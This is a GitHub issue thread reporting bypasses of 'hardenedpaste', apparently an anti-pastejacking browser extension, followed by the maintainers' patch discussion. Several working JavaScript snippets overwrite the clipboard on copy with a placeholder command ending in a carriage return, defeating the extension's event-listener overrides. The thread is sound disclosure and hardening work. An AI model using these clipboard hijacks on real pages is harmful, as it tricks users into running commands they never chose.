### ISSUE TITLE
It is trivial to bypass hardenedpaste

### ISSUE THREAD

**Issue by tomvangoethem** [rocketshipapps/hardenedpaste#1]
Bypass 1 (because `_addEventListener` is in global scope), see [example](https://output.jsbin.com/vilorejuto):

``` js
EventTarget.prototype.addEventListener = _addEventListener;
document.addEventListener('copy', function(e){
    e.clipboardData.setData('text/plain', 'echo "evil"\r\n');
    e.preventDefault();
});
```

Bypass 2 (because `oncopy` was overlooked?), see [example](https://output.jsbin.com/bakupiraya):

``` js
document.oncopy = function(e){
    e.clipboardData.setData('text/plain', 'echo "evil"\r\n');
    e.preventDefault();
};
```

**Comment by avlidienbrunn** [comment]
Or like this:

```
document.implementation.createHTMLDocument().execCommand.apply(document, ["copy"])
```

**Comment by tomvangoethem** [comment]
Another one:

``` js
function x() {};
x.prototype.toString = function(){
    if (this.c) {
        return 'copy'
    }
    this.c=1;
    return 'click';
};
document.addEventListener.call(document, new x(), function(e) {
    e.clipboardData.setData('text/plain', 'echo "evil"\r\n');
    e.preventDefault();
});
```

**Comment by oldestlivingboy** [comment]
The first case speaks to the often whack-a-mole nature of security (an attacker could override our override next, we could then override their override of our override, and so on), which is how ad blocking has worked for a decade (which [we’re very familiar with](https://github.com/rocketshipapps/adblockfast)). As far as ad blocking goes, I’d argue that ad blockers are winning and will continue to win because they can roll changes out faster and have more control over execution order than advertisers can and do. Both asymmetries apply to pastejacking as well.

I believe all the rest of the cases boil down to just one case, which I’ll be checking a patch in for shortly.

**Comment by tomvangoethem** [comment]
If you're sticking with the overriding approach, wouldn't it be better to just override `DataTransfer.prototype.setData` and `HTMLDocument.prototype.execCommand`? For the latter you'd have to check if  `command === 'copy' || command === 'cut'` (note that the strict-equal check is necessary to prevent [the aforementioned bypass](https://github.com/rocketshipapps/hardenedpaste/issues/1#issuecomment-222744776))

**Comment by oldestlivingboy** [comment]
@tomvangoethem Yes, thank you, your points are good. I’ll update the extensions (except that you **wouldn’t** want strict equality there since, e.g., `new String('copy')` would slip through).

**Comment by tomvangoethem** [comment]
Then I guess you want something like this to prevent both `new String` and `prototype.toString` bypasses:

``` javascript
type = type + '';
if (type === 'copy' || type === 'cut') {
    ...
}
```

**Comment by oldestlivingboy** [comment]
@tomvangoethem [That last commit](https://github.com/rocketshipapps/hardenedpaste/commit/052b9259daf923cb5d9cf84cfeabb3ebe078f540) matches both constructions.
